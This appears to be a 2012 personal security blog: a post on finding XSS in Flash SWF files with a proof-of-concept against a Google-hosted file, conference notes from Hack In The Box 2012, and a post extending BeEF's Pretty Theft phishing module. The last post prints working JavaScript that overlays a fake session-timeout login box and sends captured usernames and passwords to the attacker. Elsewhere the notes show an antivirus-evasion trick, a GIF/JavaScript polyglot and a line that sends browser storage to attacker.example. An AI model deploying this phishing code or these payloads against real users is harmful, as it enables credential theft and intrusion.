Saturday 27 October 2012

XSS using a Flash SWF + Google XSS

Recently I've been brushing up on my XSS. One interesting example I came across used Flash SWF files to perform XSS:

This type of attack has been around for years, but I'd never played with it myself so decided to look into it further. First up, what is an SWF? From Wikipedia:

SWF is an Adobe Flash file format used for multimedia, vector graphics and ActionScript. SWF files can contain animations or applets of varying degrees of interactivity and function.

If these files can contain ActionScript, then there's going to be input/output and potential vulnerabilities! And for media/graphics teams and companies whose focus is producing content, security is really not going to be a priority. Good news for us but bad news for anyone hosting SWFs.

For an introduction to exploiting SWFs check out the OWASP site:

The cool thing with these files is they can be decompiled with relative ease allowing you to perform static analysis. By locating the input variables and the functions that use these variables you can sometimes spot potential vulnerabilities.

So first up you need a decompiler. I found ASdec to be quick and effective; SWFScan is also a good choice, especially because it has a built-in vulnerability scanner which can speed things up.



Next, find yourself an SWF. The easiest way is to Google "filetype:swf", open any link and, in Chrome, go to Options -> Save Page As. Now you can open the SWF in ASdec, SWFScan, or both. I found ASdec easier to follow but, as already mentioned, the vulnerability scanning feature of SWFScan is pretty handy. So to start off I'd run a quick scan in SWFScan (the Analyze button). If you get lucky you might find a potential XSS/CSRF; take a look at the "Source" tab, which should have the vulnerable code highlighted.

There are two things you should look for. The first is input variables or undeclared global variables, denoted by _global, _root or _level0; these are variables we may be able to control and potentially use to exploit the SWF. The second is interesting functions that use these variables. The OWASP site has a good list of functions to look out for:

XML.load( 'url' )
LoadVars.load( 'url' )
Sound.loadSound( 'url', isStreaming )
NetStream.play( 'url' )

Next you'll need to verify how the variable is being used and if it's actually possible to take control of the function. Sometimes you won't be able to control the input value or there may be filtering in place. This is where static code analysis comes in. As each SWF is different there is no fixed method for this but I'll cover some examples below.

Example 1 - XML function with filtering (see code below)

In this first example you can see how the program accepts an XML path as input and performs some checking to prevent us from using a remote resource (such as our own malicious XML file!). The legitimate URL pointed at an XML file on the company's own domain; we want to change it to a domain we control, however in this example it's not possible due to input validation.

The first thing to take note of is the call to our input data (path = _root.xmlPath) and its subsequent use by the XML object (myXML.load(path)). At first glance this looks quite promising. However, you'll notice that before myXML.load is performed our path variable is checked using the isDomainEnabled function...

The isDomainEnabled function first checks for the existence of www or http:// (indexOf returns -1 if something doesn't exist), then checks if our domain is included in the domain list. I've blacked it out to protect the company's identity but the black spots are just the company's own whitelisted domains. So if we try to call our remote domain we end up stuck in the while loop, uh oh!

So how can we get around this filter? Encoding is an obvious choice, or how about using https:// instead of http://? :)

Example 2 - Regex filtering

Another example I encountered took in a parameter called swf_id which was later used in an ExternalInterface call. Unfortunately it was not possible to take advantage of because of regex filtering. First the parameter was loaded from the query string using root.loaderInfo.parameters.swf_id; if nothing was supplied it was left blank. Then a RegExp object was used to look for any non-alphanumeric character, and if one was found an error was thrown. This prevents us from including a URL or Javascript in the swf_id parameter :(
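Re-sketched in JavaScript (the parameter name is from the decompiled output; the regex is my reconstruction of "any non-alphanumeric character"):

```javascript
// Approximation of the swf_id validation described above.
function validateSwfId(swfId) {
  var nonAlnum = /[^a-zA-Z0-9]/; // matches any character outside a-z, A-Z, 0-9
  if (nonAlnum.test(swfId)) {
    throw new Error('invalid swf_id');
  }
  return swfId;
}

console.log(validateSwfId('demoPlayer1'));  // passes
// validateSwfId('");alert(1)//')           // throws - no URL or JS can sneak through
```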

Example 3 - ExternalInterface Call

There's a good example of how unfiltered inputs to can be abused at the below link:

This example is exploitable because of non-existent input validation of the parameters sent to the call (..., this.elementID, event).
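Under the hood, on the JavaScript side roughly builds a string of script from its arguments and asks the browser to evaluate it. The model below is my own simplification (function and payload names invented) of why unvalidated parameters are dangerous here:

```javascript
// Simplified model of the JS string that ends up being evaluated when the
// SWF calls something like, this.elementID, event).
function buildJsCall(callbackName, elementID, eventName) {
  return 'try { ' + callbackName + '("' + elementID + '", "' + eventName + '"); } catch (e) {}';
}

// Benign use:
console.log(buildJsCall('onWidgetEvent', 'banner1', 'click'));

// Attacker-controlled elementID breaks out of the string literal:
var evil = '"); alert(document.cookie); //';
var injected = buildJsCall('onWidgetEvent', evil, 'click');
// injected now contains alert(document.cookie) as live code, not data
```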

Does anyone actually use vulnerable SWFs?

After doing all this analysis I thought I'd take a look at a few sites to see if they were hosting any vulnerable SWFs as this could lead to XSS/CSRF.

Google was hosting hardly any SWFs so I checked each one in turn. One file in particular had a user interface that listed AutoDemo as its creator. Googling AutoDemo and XSS, I discovered there's a file called control.swf that is used by AutoDemo files and is vulnerable to XSS. It hadn't shown up in the original search results but it was there and it was exploitable :)

There is one caveat to this story though. The file was not hosted on one of the core Google domains; it's actually hosted on the sandboxed cache domain, "googleusercontent". So sadly it wasn't possible to steal any data using XSS. However, it would be possible to use this for phishing, and as it's based in the Google family it should still be effective at enticing users to click it.

This was the first file I found:

Here's the proof of concept XSS involving the control file."L0LZ G00GLE H4Z XSS!")//

I contacted Google about this issue; they said they didn't regard it as a serious security risk as user data cannot be compromised and the risk of phishing is minimal. For example, there's nothing stopping someone from registering a similar-looking domain, which would be far more effective for phishing. So should all vulnerabilities found in the Google cache be classified as low risk?

It's an interesting question, does the Google cache offer a unique attack vector? Maybe I'll save this for another blog post ;) If anyone has any ideas or comments feel free to leave a message below.


Saturday 13 October 2012

Hack In The Box 2012 Kuala Lumpur Day Two

So Hack In The Box 2012 is all over. I had an awesome two days, the talks were really enjoyable and it was great talking to the other folks who attended. As promised here is the write-up of day two (with one or two pictures).

List of talks I attended:
  • Why Web Security is Fundamentally Broken by Jeremiah Grossman
  • Innovative Approaches to Exploit Delivery by Saumil Shah
  • XSS & CSRF Strike Back Powered by HTML5 by Shreeraj Shah
  • iOS panel discussion
  • Messing Up the Kids Playground: Eradicating Easy Targets by Fyodor Yarochkin
  • A Scientific (But Non Academic) Study of Malware Obfuscation Technologies by Rodrigo Rubira Branco
  • Element 1337 in the Periodic Table: Pwnium by Chris Evans 

Why Web Security is Fundamentally Broken by Jeremiah Grossman

This talk focused on the fundamental flaws present in the current security model of web technology. Nothing Jeremiah talked about required a vulnerability to exploit, all of these flaws are there by design. Jeremiah started by introducing the two main categories of browser attack:
  • Attacks to escape the browser e.g. browser exploits, java exploits, adobe exploits etc.
  • Attacks from inside the browser sandbox, e.g. XSS, CSRF, clickjacking etc.
He made the point that often there is little users can do to protect themselves and the responsibility to address these flaws lies with the website owners. Next he presented a couple of examples.

img src Login Checker
This one-liner tries to retrieve an image from a site on a different domain. If the user is logged in, Twitter or Facebook will redirect to the image, sending back an HTTP 302 message. If not, an error code will be returned. There is a module within BeEF that uses this technique to check for Gmail, Facebook and Twitter login status.

<img src="" onload="successful()" onerror="error()">
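A slightly expanded sketch of the same trick, written so the image object can be faked outside a browser (the URL and callback names are mine):

```javascript
// Login detection via onload/onerror: if the user is logged in, the off-domain
// endpoint 302-redirects to a real image (onload fires); otherwise it returns
// an error or an HTML page (onerror fires).
function checkLogin(url, makeImage, report) {
  var img = makeImage(); // in a real browser: function () { return new Image(); }
  img.onload = function () { report(true); };
  img.onerror = function () { report(false); };
  img.src = url;         // setting src fires the cross-domain request
  return img;
}
```

In a browser you'd call something like checkLogin('https://social.example/logged-in-only.png', function () { return new Image(); }, callback).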

Personal Information leakage through Follows and Likes
It's surprising how much information is given away when someone follows or likes something on Twitter or Facebook. With default privacy settings it's possible for the person you follow or the page you like to actually view a selection of your personal information. Facebook and Twitter should really address this issue but this would no doubt piss off big business as data mining these sources would be prevented.

Host Information Leakage
Through browser calls and javascript it's possible to find out information such as browser version, underlying OS, browser plugins, add-ons and extensions (different to plugins). It's possible to brute force their existence by using the extension URLs from the app store.

Possible Solutions
  • To fix login detection - Do not send web visitors cookie data to off-domain destinations.
  • Not possible to fix likes or follows as money-making analytics relies on these features.
  • Ban iframes or transparent iframes. Facebook, gmail and others rely on iframes!
  • Create a barrier between public and private networks filtering particular RFCs. Not possible because businesses often have fucked up internet/intranet settings.
  • Ultimately no browser is willing to fix these issues as they might lose users.
  • Instead apply a bandage through opt-in security settings deployed by individual website owners. e.g. Secure cookies, HttpOnly, x-frame-options.
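Those opt-in bandages are just response headers and cookie flags the site owner sets; an illustrative (not site-specific) example:

```http
HTTP/1.1 200 OK
Set-Cookie: session=abc123; Secure; HttpOnly
X-Frame-Options: SAMEORIGIN
```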

There are three choices, either we:
  • Carry on as usual. 
  • Use the new .SECURE tld. 
  • Break the internet, uh oh.
As a final thought Jeremiah looked at the browser model used by mobile apps. Apps are quite often just mini versions of browsers but locked down to a particular site. This is a secure model and something that could be adopted on Desktops.

Innovative Approaches to Exploit Delivery by Saumil Shah

Saumil presented an interesting way to obfuscate javascript by encoding it within an image. He started off by covering traditional obfuscation techniques that usually rely on the eval statement to decode javascript. Although this can prevent manual analysis of code, it doesn't evade dynamic analysis and AV/IDS vendors will often flag an eval statement as suspicious! He gave a quick demo to show how easy it is to place malicious javascript in a tinyurl website and then embed it on another site or share the link through email/social networks.
Saumil then demo'ed an encoder and decoder he had built that would take javascript and convert it to a basic png and back. Neat stuff. However this still used an eval to process the image to extract and run the javascript.

He presented an easy alternative to eval:
  • Flagged by AV:  var a = eval(str);
  • Not-flagged by AV:  var a = (new Function(str))();
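You can sanity-check the equivalence yourself; the string here is my own toy payload:

```javascript
var str = 'return 6 * 7;';

// The eval route that AV flags:
// var a = eval('(function(){ ' + str + ' })()');

// The quieter Function-constructor route: build a function
// from the same source string and call it immediately.
var a = (new Function(str))();
console.log(a); // 42
```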
Next up he demonstrated how to create a file that is both an image and javascript. Wut?!?! I can't remember exactly how he did this, but if you look at the hex of a gif you will see the gif89a header followed by some width and height bits; apparently you can just stuff javascript after these bits inside comment tags /**my javascript**/ and it will be executed. All you do is embed it in the page with the following:

<img src="a.gif">
<script src="a.gif"></script>

And this worked on all browsers. Next he presented a bmp example, where he had inserted the javascript in the alpha channel section of the image and the original image remained completely intact.
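From memory, the gif trick works because the file parses as both formats: "GIF89a" is a legal JavaScript identifier, and if the dimension bytes happen to decode as characters that open a comment, the binary body is hidden from the JS parser. A text-only toy reconstruction (the layout and payload are my guesswork, not Saumil's actual bytes):

```javascript
// A string shaped like the gif/js polyglot described above.
var fileAsText =
    'GIF89a' +                      // GIF magic bytes, which double as a JS identifier
    '/*' +                          // "dimension" bytes chosen to open a JS comment
    'BINARY-IMAGE-DATA' +           // the real image body (must not contain "*/")
    '*/' +
    '=1;globalThis.pwned = true;';  // assignment keeps the syntax legal, then the payload

(new Function(fileAsText))();       // roughly what <script src="a.gif"> does
console.log(globalThis.pwned);      // true
```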

Combining these techniques he demoed two images, one containing the payload, the other the decoding routine. It was cool seeing this in action and I can imagine it's a nightmare for AV vendors to try and catch this kind of obfuscation.

In his final demo he placed adobe reader exploit code within an image in a pdf and used it to exploit adobe reader.

This talk reminded me a lot of Thor's talk at DefCon "Socialized Data: Using Social Media as a Cyber Mule" where he demoed embedding data in video and images. At the moment I don't think this is something malware authors have really focused on just because they haven't needed to but I'm sure going into the future we'll see more of this stuff in the wild.

XSS & CSRF Strike Back Powered by HTML5 by Shreeraj Shah

I actually saw this talk at BlackHat 2012 but I found Shreeraj went through his material really fast. Unfortunately it was the same this time round as well :( He essentially took us on a whistlestop tour of HTML5, the modern browser architecture and exactly where the issues lie.

Shreeraj presented a few examples, I'm only going to mention my favourites:

CSRF with XHR and CORS bypass
Before HTML5, cross-domain XHR was not possible; now pages can set CORS headers to allow it. For example, when a site sets the access-control-allow-origin header to any origin, i.e. "access-control-allow-origin: *", you can successfully make cross-domain calls. What this means is that if a user were to visit, say, legitimate site A that happened to contain malicious javascript, an attacker would be able to do CSRF or pull data from the user's session on legitimate site B.
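Ignoring credentialed-request subtleties, the browser's read-allowed decision boils down to a header comparison. A simplified sketch (my own model, not the full CORS algorithm):

```javascript
// Can a page at pageOrigin read a cross-domain XHR response, given the
// server's Access-Control-Allow-Origin header? (Simplified: real CORS has
// extra rules for credentialed requests, where "*" is not allowed.)
function corsAllowsRead(allowOriginHeader, pageOrigin) {
  return allowOriginHeader === '*' || allowOriginHeader === pageOrigin;
}

console.log(corsAllowsRead('*', 'https://evil.example'));                       // true - anyone can read
console.log(corsAllowsRead('https://partner.example', 'https://evil.example')); // false
```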

He demonstrated how a malicious attacker could modify the code of a page to use cross domain resources. For example to replace a login element on the current page with remote data:


Instead of me writing a really poor explanation I'd recommend this link for some great examples of these techniques:

Web Storage
HTML5 brings some really interesting new features, such as the ability for web sites to create SQL databases or filesystems in the browser. If a website implementing these features contains XSS, an attacker can pull all of a user's data from these resources. It's cool but unfortunately not possible cross domain.

In Chrome you can view a site's resources by bringing up the developer console: right click the page and select Inspect Element. Under the Resources tab you will be able to see any locally stored data, including session data and cookies.
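As a sketch of what injected script could do, here's a dump routine (the storage object is a parameter so it can be exercised outside a browser; in a real attack you'd pass window.localStorage):

```javascript
// Walk a Web Storage object (localStorage/sessionStorage) and copy it out.
function dumpStorage(storage) {
  var out = {};
  for (var i = 0; i < storage.length; i++) {
    var key = storage.key(i);
    out[key] = storage.getItem(key);
  }
  return out;
}
```

An attacker would then exfiltrate the result with something like new Image().src = 'https://attacker.example/?d=' + encodeURIComponent(JSON.stringify(dumpStorage(window.localStorage))); (attacker.example being a placeholder of mine).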

For more awesome HTML5 hacks it's worth checking out:

iOS Panel Discussion by @Musclenerd, David ‘@planetbeing’ Wang, Cyril ‘@pod2g’ and Mark Dowd

I went to see the iOS6 talk on day one and found it a bit tricky to follow as I don't have a lot of experience with iOS or writing kernel exploits. Although this panel discussion focused on similar material it was more high level and not as technical as the previous talk.

Despite the ASLR, heap hardening, address space protection and more added by Apple, there's no doubt these will be the guys releasing a jailbreak for the iPhone 5 in the coming weeks.

Messing Up the Kids Playground: Eradicating Easy Targets by Fyodor Yarochkin

Fyodor presented a rushed and somewhat unclear talk on ways to detect/catch malware and botnet owners by analysing DNS records.

He started by giving an overview of the Crimeware as a service (CaaS) scene. He described how different groups are generally responsible for different parts of the service. Fundamentally this is a black market economy where there is competition between individuals and just like the real business world it's far more profitable to cooperate with others to get the job done. This has resulted in different groups that each specialise in either malware creation, traffic generation, infrastructure or handling stolen data and each group will sell their services to the highest bidder.

He provided an interesting example of a banner advertising agency in Russia that has managed to escape prosecution because they claimed they had been hacked and there just wasn't enough evidence to achieve a conviction.

Next Fyodor showed two ransomware examples: one that had been installed locally through a browser exploit, and one fake Firefox update javascript example running in the browser.

The remainder of the talk was a bit rushed, he talked a bit about how patterns in DNS can be used to detect botnets. Typically the same registrar will be reused and also the same whois information. It is also possible to automate detection of malicious domain names but he didn't go into how to do this.

He mentioned fast flux techniques where malicious domains are rotated very rapidly to evade detection and suggested how this could be done. Apparently a number of registrars offer a returns policy on domains and charge only a small cancellation fee. This allows botnet infrastructure owners to repeatedly change domains for only a small cost. He also talked about how you can try to predict the domains they will use in the future. If you guess correctly then you will get bots actually connecting to you. Sweet.

A Scientific (But Non Academic) Study of Malware Obfuscation Technologies by Rodrigo Rubira Branco

I only caught the last 20 minutes of this talk and regretted not watching from the start. Rodrigo is head of malware research at Qualys and can best be described as a funny Brazilian guy. In his talk he presented an analysis of anti-debugging and obfuscation techniques used by malware.

I missed the first half of the talk where he described the various anti-debugging techniques used but I was lucky enough to catch the second half where Rodrigo explained how the presence of anti-debugging in malware can actually be used as a way to detect the malware. It's such a simple idea and I'm really surprised (as was Rodrigo) that AV vendors don't use these techniques already.

For more info -

Element 1337 in the Periodic Table: Pwnium by Chris Evans 

The final talk of the day was presented by Chris Evans, a senior member of the Google security team. He started off by handing out a big pile of cash to different researchers for their contributions. Props to Google for supporting the security community.

Chris mentioned how successful the vulnerability disclosure program had been since its launch and presented some statistics. I was surprised to see that Chrome has contained so many vulnerabilities. I had rather naively assumed Google developers were invincible! Take a look for yourself: each month a ton of vulnerabilities get reported.

Next he discussed Pinkie Pie's working Chrome exploit. Pinkie's exploit abused a use-after-free vulnerability in the SVG module to compromise the renderer process within Chrome, plus a ROP chain to evade ASLR. To escape the Chrome sandbox and access Windows he used specific IPC messages that weren't properly restricted. In other words, no super fancy exploit was needed to escape the sandbox, just a simple call to the Chrome IPC layer. Chris was facepalming live on stage at this point. More info can be found here:

Lock-picking stand:

CTF contest:

It was an awesome two days and hopefully I'll be back next year. If anyone has any comments or questions feel free to post them below.

Pwndizzle over and out.

Thursday 11 October 2012

Hack In The Box 2012 Kuala Lumpur Day One

Hey guys,

This is a quick write-up of my experiences at Hack In The Box 2012 in Kuala Lumpur (day one). For each talk I attended I've tried to include a summary of the main points. Sadly I forgot to take pictures so it's one massive wall of text, sorry! Will try and take some for day 2.

List of talks I attended:

  • Tracking Large Scale Botnets by Jose Nazario
  • Data Mining A Mountain of Vulnerabilities by Chris Wysopal
  • 6000 Ways And More - A 15 Year Perspective on Why Telcos Keep Getting Hacked by Philippe Langlois & Emmanuel Gadaix
  • A Short History of The JavaScript Security Arsenal by Petko Petkov
  • iOS6 Security by Mark Dowd & Tarjei Mandt
  • "I Honorably Assure You: It is Secure”: Hacking in the Far East by Paul Sebastian Ziegler

Tracking Large Scale Botnets by Jose Nazario

Jose's talk focused on the techniques that are used today to measure the size of botnets by tracking down infected machines.

The general aim of his work was to measure the number of bots, in terms of infected machines/IPs/people/accounts, and to classify the bots by type, geographical region and what the bot does (financial, DoS, infrastructure impact). An interesting quote from a colleague was "it can be easy to identify and count the number of infected machines but it's impossible to know the total number of machines (clean and infected) on the internet today". This makes it difficult to really gauge the scale of the problem. He also noted that the resources of security teams are limited and should be carefully prioritized.

Next Jose talked about the actual methods used to track botnets:
  • Sinkholes - Redirect CnC traffic to your server using DNS injection, P2P injection or route redirection, then count unique IPs connecting per day. Once redirected, you can send updates and commands to the bots (e.g. a removal command), however usually this isn't done for legal reasons. Sometimes it's not possible to directly interact with the bots as they sign updates or have other protections (e.g. encryption). There are two major advantages to using sinkholes: once you have redirected CnC traffic you (i) effectively lock out the botnet herder and (ii) can find out who is infected.
  • Traffic logs - If you can monitor traffic logs, botnet traffic requests often contain a unique identifier. For example, in Conficker there was a "q" value that acted as an identifier.
  • Darknet monitoring - Monitor traffic destined for unused IPv4 address space blocks. It is possible to detect scanning from infected machines targeting the unused IPv4 regions.
  • URL Shorteners - Short URLs are commonly used to spread malware (e.g. tinyurl). It is possible to analyse the characteristics of users who have clicked known bad links; for example, using a URL shortener's statistics you can view who clicked the link, their OS, browser etc.
  • Direct Network Access - Possible to directly monitor network traffic, e.g. at an ISP.
  • Direct Host Access - Microsoft is in the best position as it can directly interact with Windows hosts and count incidents from Windows Defender. This data is currently not publicly available.
  • Direct P2P enumeration - Crawl the botnet, asking peers who they know, and gather a full list. You need to reverse the protocol, and it can be difficult to break the crypto. 
Jose noted that you can't always see all of the bots due to poor network visibility, traffic redirection by ISPs, DNS blacklists or offline hosts. It's also possible to over/under count the number of infected machines because of DHCP (as devices change IP the same device might appear multiple times), NAT (which can really mess up estimates, e.g. for the Blaster worm in 2003 Arbor estimated 800,000 infections whereas Microsoft estimated 8,000,000) and opt-out (users who disable updates or reporting).

Data Mining A Mountain of Vulnerabilities by Chris Wysopal

Chris works for Veracode where he focuses on secure code review. He presented findings from a comprehensive study of the vulnerabilities found in 9910 commercial and government applications (using static and dynamic analysis). He had correlated the vulnerabilities with the metadata of the applications (e.g. type of application, size, origin, language used) to find meaningful statistics.
  • Most applications were internally developed (75%), 15% were commercial applications and 10% open source; 50% were built with Java, 25% with .NET.   
Comparing OWASP statistics with the 9910 applications analysed:
  • SQL injection was used in 20% of all attacks while 32% of apps were vulnerable.
  • XSS was used in only 10% of attacks while 68% of apps were vulnerable.
  • Information leakage was used in only 3% of attacks but 66% of apps were vulnerable. 
XSS appears massively under-targeted. Next, comparing languages:
  • In Java, ColdFusion, .NET and PHP applications, XSS is the most common vulnerability. 
  • However, when Adobe added a language-level fix for XSS this helped address the issue somewhat. 
  • C++ applications had completely different vulnerabilities, e.g. buffer overflows and error handling issues. 
  • PHP had a lot of SQL injection and directory traversal issues, way more than Java and .NET.
Language choice matters a lot! Comparing how vulnerabilities have changed over time:
  • The number of XSS vulnerabilities has remained steady over the last 2 years, indicating it's not being exploited as much as other vulnerabilities and hence not being fixed.
  • The number of SQL injection vulnerabilities has decreased over the last 2 years. Most likely due to the publicity SQL injection has received.
  • Overall 86% of applications contain at least one vulnerability from the OWASP Top 10.

Industries and business:
  • Which industries are getting their code externally tested? 
  • Finance, Software makers, Tech. 
  • Utilities is one of the worst performing. (but what about all that critical infrastructure?!?! uh oh.)
  • Which industry is most secure? 
  • Finance is most secure. 
  • Surprisingly security products themselves were most insecure!
  • Does size of company matter?
  • No difference in number of vulnerabilities between public and private companies.
  • No difference in number of vulnerabilities by company revenue.
  • The bottom-line - Company size and revenue don't affect the quality of code!

Regarding vulnerabilities in mobile apps, the major differences were related to the language chosen. As Android is Java based there is more XSS/SQLi, whereas iOS apps are written in Objective-C and so have buffer management errors and directory traversal issues not found in Java. However, iOS apps are signed so are safer overall!

Chris finally talked about the software developers and how they are ultimately responsible for the quality of code. He presented a statistic that on average half of all developers don't understand security. When put like this it seems fairly obvious why there are so many security flaws in modern applications. More security awareness seems to be the answer.

6000 Ways And More - A 15 Year Perspective on Why Telcos Keep Getting Hacked by Philippe Langlois & Emmanuel Gadaix

This was an interesting talk. Unfortunately I don't have a lot of experience with telco backbone infrastructure or protocols so I found a lot of the presentation tricky to understand. One thing was clear though - telcos have a ton of serious security flaws.

The main issues are:
  • Currently operators are focused on availability, fraud, it security, interception, spam.
  • There are few experts in the field of telco security.
  • The walled garden approach and a rigid industry dominated by big players.
  • Scary how easy attacks are and they are happening behind closed doors.
Like a lot of other industries they try to rely on security through obscurity and have a reactive as opposed to proactive approach to security. Hopefully things will change with the buzz around cyberwar and the importance of national infrastructure.

A Short History of The JavaScript Security Arsenal by Petko Petkov

This was by far my favourite talk of the day. Petko started by giving a quick history of browser technology and common attack methodologies today. At the moment there are two main choices, Beef can be used for XSS/javascript attacks or Metasploit can be used to target vulnerabilities within the browser itself. Both have limitations and with browsers becoming a lot more secure new techniques are needed.

Three evil plans (attack vectors) were presented:
  • Use the victim to attack other web targets.
  • Use the victim to attack internal resources.
  • Use the victim to attack others through social networks.
  • Bonus plan - Use the victim's browser to compromise the underlying system.

He described how his tools have evolved and referenced the below specifically:

JSPortScanner -> AttackAPI -> WebSecurify Suite -> Weaponry

One of the major limitations is that it's difficult to port classic security tools from C, Ruby etc. to javascript so they can be used in the browser. Weaponry is intended to address this issue: by creating a custom cross-compiler it would be possible to convert your favourite programs to javascript and use them directly in the browser. (At least this is what I thought he was saying.)

Petko demo'ed a browser extension for Chrome and Firefox that had a range of attack functionality built in. This would allow a remote attacker to use the person's browser as a pivot. I was particularly impressed by how light the extension seemed to be and how quickly it performed scans and analysed data. It really was a step up from Beef. Oh and the UI was really sexy.

The one area I asked Petko about was initial compromise, which is something he didn't really explain. For a malicious attacker to use these techniques the target would need to install the malicious browser extension. While not as likely to succeed as, say, Beef, you only need to look at the prevalence of malicious apps to understand that people would be more than stupid enough to install this kind of application if packaged correctly.

Overall I was really impressed. I spoke to Petko at the end and he said that the project will be open source but is currently still under construction.

iOS6 Security by Mark Dowd & Tarjei Mandt

I was originally going to see a talk by the founders of the pirate bay but they apparently got detained in Bangkok and so couldn't make it to the conference. Instead I headed over to the iOS6 talk hoping to learn something new.

This was quite a technical talk digging into the new anti-jail-breaking protections (stack cookies, ASLR, Heap protections) put in place by Apple in iOS6. Having only limited experience with exploit design and next to no experience with the internals of iOS I did struggle to follow the talk. I gotta say though how impressed I was at the way these guys picked apart iOS with such ease. With everything these guys understood it was hardly surprising seeing them produce such a complex jailbreak (again!). All I kept thinking was "Why hasn't Apple hired these guys?".

"I Honorably Assure You: It is Secure”: Hacking in the Far East by Paul Sebastian Ziegler

In the final presentation of the day Paul talked about his experiences with IT security (and life in general) in Japan and South Korea. Having lived in Japan myself I was interested to find out how different or similar his experiences were to mine.

He started by talking about the god-like status given to white foreigners in Japan and how this can be used for social engineering. He suggested foreigners could be broken down into three categories (military, English teachers and businessmen), and out of those the businessman commands the most respect and so is perfect for social engineering. And all that is needed is a suit; magically, once the suit is on, you become immune to everything.

And in emergencies (when the suit doesn't work) just play the dumb foreigner card. Having done this myself I can confirm this is a very useful strategy!

He went on to talk about the prevalence of open wireless networks and the use of WEP in Japan, and how open networks are everywhere in South Korea. He then talked about SEED, a government alternative to SSL that is deployed everywhere in South Korea. This has a knock-on effect where users are forced to use legacy browsers, as SEED doesn't support modern browsers. With users migrating from Windows XP to Windows 7, they have been forced to install IE6 on Windows 7 in order to use SEED websites. IE6 use was always high in South Korea because of SEED, but recently it's actually been increasing! Crazy, eh.

Day two will be up tomorrow.



Tuesday 2 October 2012

Update to the Pretty Theft (phishing) module in BeEF

Hi all,

Today I'm going to be talking a bit more about BeEF and specifically the Pretty Theft module.

For those of you who don't know, BeEF (the Browser Exploitation Framework) is a tool that cleverly uses the browser's built-in functionality, javascript and other third party software against the user. What's interesting is that it doesn't rely on any exploit (although this is also possible) to get the job done, so even if you are fully patched you can still be attacked using BeEF.

Initial compromise of the user's browser usually relies on XSS, luring the user to your own website containing malicious javascript, or MITM injection of javascript. Once a user runs the BeEF hook javascript, their browser silently connects back to the BeEF admin and you can deploy any of the 125 BeEF modules.
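To make the hooking step concrete, here's a minimal sketch of what an injected payload boils down to. The host, port and helper function name are my assumptions for illustration (BeEF does serve its hook as hook.js, and 3000 is its default port):

```javascript
// Hypothetical XSS payload builder: the injected markup simply loads the BeEF
// hook script from the attacker's server. Once hook.js executes, the victim's
// browser starts polling back to the BeEF admin panel.
function buildHookPayload(host, port) {
  // The closing tag is split ("<\/script>") so the string can live safely
  // inside an inline <script> block without terminating it early.
  return '<script src="http://' + host + ':' + port + '/hook.js"><\/script>';
}

var payload = buildHookPayload('attacker.example', 3000);
```

In a real XSS scenario this string would be reflected or stored into the vulnerable page; everything after that is handled by the hook itself.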

BeEF is included with Backtrack but you probably want to do a git clone to get the latest version (see previous post!). For more info the BeEF site is here:

So what is the Pretty Theft module?

The Pretty Theft module is a phishing module that uses floating divs to create legitimate-looking fake login boxes that are displayed in the browser. It was originally created by Nickosaurus Hax. I really liked the idea of the module but it was quite basic; there was only one default pop-up and it looked really fake. To make the module more effective I decided to try to add some additional pop-up boxes with different styles.

The original pretty theft dialog box:

To start with I wanted to create a Facebook pop up, a LinkedIn pop up and also to update some of the module logic.

How does Pretty Theft work?

The module starts by creating a semi-transparent grey background that covers the whole page. This prevents the user from interacting with the page and forces them to confront the pop-up box.

(Code slightly edited for blog)

//Define properties
var zindex = options.zindex || 50;
var opacity = options.opacity || 70;
var opaque = (opacity / 100);
var bgcolor = options.bgcolor || '#000000';
var dark=document.getElementById('darkenScreenObject');

//Build layer and position
var tbody = document.getElementsByTagName("body")[0];
var tnode = document.createElement('div'); // Create the dark layer
tnode.style.position = 'absolute';         // Position absolutely
tnode.style.top = '0px';                   // In the top
tnode.style.left = '0px';                  // Left corner of the page
tnode.style.overflow = 'hidden';           // Try to avoid making scroll bars
tnode.style.display = 'none';              // Start out hidden
tnode.id = 'darkenScreenObject';           // Name it so we can find it later
tbody.appendChild(tnode);                  // Add it to the web page
dark = document.getElementById('darkenScreenObject'); // Get the object

//Assign style properties
dark.style.opacity = opaque;
dark.style.MozOpacity = opaque;
dark.style.filter = 'alpha(opacity='+opacity+')';
dark.style.zIndex = zindex;
dark.style.backgroundColor = bgcolor;
dark.style.width = pageWidth;
dark.style.height = pageHeight;
dark.style.display = 'block';

Next, a separate div is created to simulate a pop-up window; the style and positioning are defined and it is appended to the page.

// Generic floating div with image
function generic() {
sneakydiv = document.createElement('div');
sneakydiv.setAttribute('id', 'popup');
sneakydiv.setAttribute('style', 'width:400px;position:absolute; top:30%; left:40%; z-index:51; background-color:white;font-family:\'Arial\',Arial,sans-serif;border-width:thin;border-style:solid;border-color:#000000');
sneakydiv.setAttribute('align', 'center');

sneakydiv.innerHTML= '<br><img src=\''+imgr+'\' width=\'80px\' height=\'80px\' /><h2>Your session has timed out!</h2><p>For your security, your session has been timed out. To continue browsing this site, please re-enter your username and password below.</p><table border=\'0\'><tr><td>Username:</td><td><input type=\'text\' name=\'uname\' id=\'uname\' value=\'\' onkeydown=\'if (event.keyCode == 13) document.getElementById(\"buttonpress\").value=\"true\";\'></input></td></tr><tr><td>Password:</td><td><input type=\'password\' name=\'pass\' id=\'pass\' value=\'\' onkeydown=\'if (event.keyCode == 13) document.getElementById(\"buttonpress\").value=\"true\";\'></input></td></tr></table><br><input type=\'button\' name=\'lul\' id=\'lul\' onClick=\'document.getElementById(\"buttonpress\").value=\"true\";\' value=\'Ok\'><br/><input type="hidden" id="buttonpress" name="buttonpress" value="false"/>';

// Add the pop-up to the page, then repeatedly check if the button has been pressed
document.body.appendChild(sneakydiv);
credgrabber = setInterval(checker,1000);
}


Once the OK button is pressed, a hidden variable is set to true. The checker function is called every second and verifies that the button has been pressed and the input boxes contain some data. If everything checks out, the data is sent to the BeEF admin and the divs are removed from the page, leaving the user to carry on browsing happily. If the user didn't enter any data, they are prompted with an alert and sent back to the dialog box.

function checker(){
uname1 = document.body.lastChild.getElementsByTagName("input")[0].value;
pass1 = document.body.lastChild.getElementsByTagName("input")[1].value;
valcheck = document.body.lastChild.getElementsByTagName("input")[3].value;

if (uname1.length > 0 && pass1.length > 0 && valcheck == "true") {
// Join user/pass and send to attacker
answer = uname1+":"+pass1;
beef.net.send('<%= @command_url %>', <%= @command_id %>, 'answer='+answer);
// Set lastchild invisible
// Lighten screen

}else if((uname1.length == 0 || pass1.length == 0) && valcheck == "true"){
// If user has not entered any data, reset the button
document.body.lastChild.getElementsByTagName("input")[3].value = "false";
alert("Please enter a valid username and password.");
}
}

What sneaky tricks do you use to fool the user?

